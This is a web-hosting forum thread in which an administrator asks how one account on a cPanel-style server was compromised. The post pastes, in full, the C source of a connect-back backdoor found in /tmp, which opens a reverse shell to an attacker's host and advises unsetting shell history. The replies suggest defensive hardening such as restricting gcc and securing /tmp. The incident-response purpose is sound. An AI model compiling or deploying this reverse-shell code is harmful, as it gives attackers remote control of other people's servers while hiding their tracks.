One account hacked through /tmp

[elleryjh]

One account on a new, up-to-date server was hacked. The account doesn't have shell access. The site's index page was changed, with no other visible. The user is not likely to have done the exploit.

phpsuexec, suexec and php_basedir are all enabled.

No FTP activty for that account was listed in /var/log/messages.

No processes are running by that user.



Does anybody know how this attack was carried out, and where to look for more evidence?

/tmp is mounted as noexec, and
root@server [/tmp]# /scripts/securetmp
/tmp is already secure
/var/tmp is already secure
Process Complete

However, looks like this file was compiled and run... This file and it's binary was in /tmp, owned by that user:
root@server [/tmp]# more dc-connectback.c
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
printf("Data Cha0s Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port>\n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
printf("[*] Resolving Host Name\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("[*] Connecting...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("[*] Detached\n\n");
return 0;
}

[Stenny Chong]

I suggest you do the following to secure or disallow other user compiling program.

chmod 700 /usr/bin/gcc.

[kris1351]

Definately need to run /scripts/securetmp

This will make it so no compiling or executions can happen in tmp. Like Stenny said also make gcc non-executable. You can change it when you need to compile very easily.